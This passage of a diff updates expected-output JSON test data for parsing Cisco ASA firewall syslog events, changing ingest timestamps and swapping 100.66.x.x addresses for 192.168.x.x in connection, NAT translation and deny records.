"severity": 6, - "ingested": "2021-07-19T09:06:25.095102796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:32:20.604842100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095104768Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604850100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095106483Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604856100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095108211Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604861800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095121279Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604866300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095123681Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604870900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095125600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604890300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095127494Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604895Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095129365Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604900500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095131231Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604905900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095133051Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604911300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095134905Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604916700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095136716Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604922100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095138553Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604927400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095140350Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604932700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095142233Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604940300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095144068Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:32:20.604946Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095145899Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:32:20.604951400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 @@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095147747Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604956800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095149580Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604962100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095151396Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604967600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095153215Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604971600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095155032Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:32:20.604976100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095156935Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604981200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095158782Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:32:20.604985700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095160616Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:32:20.604989300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095162449Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604993500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095164261Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604999Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095166101Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605004500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095167927Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605008100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095169742Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605012300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095171548Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605015800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095173359Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.605020400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.095175163Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.605025600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095176976Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605029800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17991,8 +17991,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095178945Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605035300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18028,8 +18028,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18063,7 +18063,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18072,8 +18072,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095180795Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605040900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18104,8 +18104,8 @@ }, "destination": { "port": 8310, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1306, @@ -18145,7 +18145,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -18153,8 +18153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095182604Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310", + "ingested": "2021-12-09T13:32:20.605046300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -18187,8 +18187,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18223,7 +18223,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18232,8 +18232,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095184438Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", + "ingested": "2021-12-09T13:32:20.605052Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -18249,7 +18249,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11844", "source_interface": "outside", "mapped_destination_port": 1306 @@ -18271,8 +18271,8 @@ }, "source": { "port": 80, - "address": 